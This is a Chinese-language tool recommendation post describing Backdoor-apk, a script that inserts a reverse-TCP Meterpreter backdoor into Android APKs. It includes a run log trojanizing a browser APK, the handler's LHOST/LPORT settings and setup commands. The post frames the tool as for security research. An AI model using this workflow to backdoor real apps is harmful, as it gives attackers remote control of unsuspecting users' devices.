工具推薦:Backdoor-apk,安卓APK文件后門測試工具
Backdoor-apk可以看成是一個shell腳本程序,它簡化了在Android APK文件中添加后門的過程。安全研究人員在使用該工具前應該對Linux、Bash、Metasploit、Apktool、Android SDK 、smali有所了解,同時原作者表示該工具僅僅供研究和學習使用。
文章中介紹的工具、技術帶有一定的攻擊性,僅供安全研究,請合理合法使用。
參數以及啟用
root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk
[*] Generating reverse tcp meterpreter payload...done.
[+] Handle the meterpreter connection at: 10.6.9.31:1337
[*] Decompiling original APK file...done.
[*] Decompiling RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Merging permissions of original and payload projects...done.
[*] Recompiling original project with backdoor...done.
[*] Signing recompiled APK...done.
root@kali:~/Android/evol-lab/BaiduBrowserRat#
制作好的apk文件應該在original/dist目錄下找到,將其安裝在測試設備上,然后設置好IP以及端口再利用meterpreter 進行測試。
注意
如果在Kali里面運行還需要安裝兼容庫
apt-get install lib32stdc++6 lib32ncurses5 lib32z1
配置
在出現問題時可更新下面配置信息
MSFVENOM=msfvenom
LHOST="10.6.9.31"
LPORT="1337"
APKTOOL=apktool2
MY_PATH=`pwd`
ORIG_APK_FILE=$1
RAT_APK_FILE=Rat.apk
LOG_FILE=run.log
項目地址:猛戳我
來源:FreeBuf
本文由用戶 jopen 自行上傳分享,僅供網友學習交流。所有權歸原作者,若您的權利被侵害,請聯系管理員。
轉載本站原創文章,請注明出處,并保留原始鏈接、圖片水印。
本站是一個以用戶分享為主的開源技術平臺,歡迎各類分享!